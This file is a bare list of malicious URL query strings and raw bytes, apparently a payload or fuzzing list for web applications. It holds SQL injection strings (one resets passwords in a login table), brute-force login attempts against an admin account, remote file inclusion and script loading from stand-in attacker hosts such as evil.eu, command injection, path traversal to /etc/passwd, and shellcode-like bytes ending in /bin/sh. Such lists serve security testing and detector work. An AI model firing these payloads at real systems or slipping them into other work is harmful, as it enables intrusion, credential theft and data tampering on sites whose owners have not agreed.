?form=\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00\x80\xe8\xdc\xff\xff\xff/bin/sh
?username=admin&password=1234
?username=admin&password=1235
?username=admin&password=1236
?username=admin&password=1237
?username=admin&password=1238
?username=admin&password=1239
?username=admin&password=admin
?username=admin&password=password
?username=admin&password=admin2
?page=1&customerId=AND%id%IS%NULL;
?customerId=1OR%201=1
?file=http://evil.eu/sh
?file=http://evil.eu/root.asp
?post==<?php print $settings[database][password]; ?>
?ip=|+ls+-l
?id=0%20or%201=1
?post=%3script%3ealert(1);
?session=duf8423ufdjr49cce3ije33ssaq2223
?session=vwdefcwec334scfdjr49ccededfewsd
?data=oo00oo00oo00oo00oo00oo00oo00oo00oo00oo00oo00oo00
?data=%3cscript%20src=%22http%3a%2f%2fwww.hacckingplace.com%2fnasty.js%22%3e%3c%2fscript%3e
?userid=bob%27%3b%20update%20logintable%20set%20passwd%3d%270wn3d%27%3b--%00
%u0061?[buffer]=89898
%2e%2e%2f%2e%2e%2f%2e%2e%2f/bin/bashhttp%3a%2f%2fwww.dvvv23.cin%2fscript.sh
?user=admin&amount=100000
%2e%2e%2f%2e%2e%2f%2e%2e%2ffile:///etc/passwd
?form=\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x80\xe8\xdc\xff\xff\xff/bin/git
\xf5@~\xcc\r\xfdKJ\x0c=u[c\xfb+3\x88\xd2%z
\xf9\xa9\xa5\xcc\xa87\x17,b\xfe%\xb4C\x8f\xf3\xf9\xd4\xb4K\xb9Z\x90\x06>?\xf6\xddz\xf3P\xd3{\xa8
?page=/../../../../../../etc/passwd
?page=http://192.168.80.128/rfi.php
?cmd=pwd&page=http://hackersite.com/dsfsdasfsd.php
.env/README.txt
.well-known/assetlinks.json